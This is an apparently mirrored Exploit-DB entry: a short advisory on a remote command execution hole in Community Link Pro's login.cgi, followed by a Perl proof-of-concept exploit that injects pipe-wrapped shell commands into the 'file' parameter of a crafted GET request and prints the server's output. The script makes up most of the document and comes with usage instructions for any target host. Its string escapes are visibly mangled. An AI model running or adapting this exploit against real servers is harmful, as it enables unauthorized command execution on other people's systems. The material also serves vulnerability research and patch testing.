https://www.exploit-db.com/exploits/25920

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/14097/info

Community Link Pro is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.

Due to this, an attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server. 

#!/usr/bin/perl
# ___                 ___                     __
# _ |__ _____     __| _/______  ____   _____/  |_
#  | __ \__     / __ |_  __ /  _  /  _    __
#  | _ / __ _/ /_/ | |  | (  <_> |  <_> )  |
#  |___  (____  /____ | |__|   ____/ ____/|  | Security Group
#      /     /      /                      ||
#                                             /
# Login.cgi Remote Command Execution PoC Exploit
# by: spher3 - [email protected]
# www.badroot.org

use strict;
use IO::Socket::INET;

sub USAGE()
{
  print "USAGE:n",
        "perl $0 [host] [path] [cmd]nn",
        "EXAMPLE:n",
        "perl www.site.org /webeditor/ "uname -a"nn";
  exit 0;
}

USAGE unless $ARGV[2];

my $host = $ARGV[0];

my $path = $ARGV[1];

my $cmds = join  (  '%20', split  (  / /, $ARGV[2]  )  );

my $vuln = $path . "login.cgi?username=&command=simple&do=edit&password=&file=|" . $cmds . "|";

print  "Badroot Security Group - www.badroot.orgn", 
       "Login.cgi Remote Command Executionnn",
       "- Target: $hostn",
       "- Path: $pathnn"; 

my $sock = IO::Socket::INET->new  (  PeerAddr => $host,
                                     PeerPort => 80,
                                     Proto => "tcp",
                                     Type => SOCK_STREAM  ) || die "Error: $!n";

print $sock "GET " . $vuln ." HTTP/1.1nr",
            "Accept: */*rn",
            "User-Agent: Badrn", 
            "Host: $hostrn",
            "Connection: Keep-Alivernrn";             

my $lE = 0;

while  (  <$sock>  )
{

  if (  $_ =~ /</textarea/  )
  {
    $lE = 0;
    close  (  $sock  ) && exit 0;
  }
  
  print $_ if $lE == 2;

  ++$lE if $lE == 1;

  if (  $_ =~ /<textarea/  )
  {
    ++$lE;
  }

}